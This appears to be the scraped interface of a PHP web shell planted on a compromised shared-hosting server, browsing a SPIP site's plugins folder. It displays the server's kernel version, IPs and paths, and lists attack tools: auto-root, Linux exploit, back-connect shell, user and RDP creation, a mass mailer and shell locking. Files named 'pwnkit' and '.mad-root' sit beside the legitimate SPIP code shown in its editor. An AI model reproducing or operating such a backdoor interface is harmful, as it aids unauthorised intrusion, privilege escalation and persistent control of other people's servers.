Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
afficher_liste.php
3.62
KB
-rw----r--
afficher_nom_plugin.php
1.84
KB
-rw----r--
afficher_plugin.php
11
KB
-rw----r--
afficher_repertoires.php
3.59
KB
-rw----r--
extraire_boutons.php
1.87
KB
-rw----r--
extraire_pipelines.php
1.27
KB
-rw----r--
get_infos.php
3.72
KB
-rw----r--
infos_paquet.php
12.08
KB
-rw----r--
installer.php
6.75
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
verifie_conformite.php
6.78
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : extraire_pipelines.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Extraire les infos de pipeline * * @param array $arbre */ function plugins_extraire_pipelines_dist(&$arbre) { $pipes = null; $tag = null; $pipeline = []; if (spip_xml_match_nodes(',^pipeline,', $arbre, $pipes)) { foreach ($pipes as $tag => $p) { if (!is_array($p[0])) { [$tag, $att] = spip_xml_decompose_tag($tag); $pipeline[] = $att; } else { foreach ($p as $pipe) { $att = []; if (is_array($pipe)) { foreach ($pipe as $k => $t) { $att[$k] = trim(end($t)); } } $pipeline[] = $att; } } } unset($arbre[$tag]); } return $pipeline; }
Close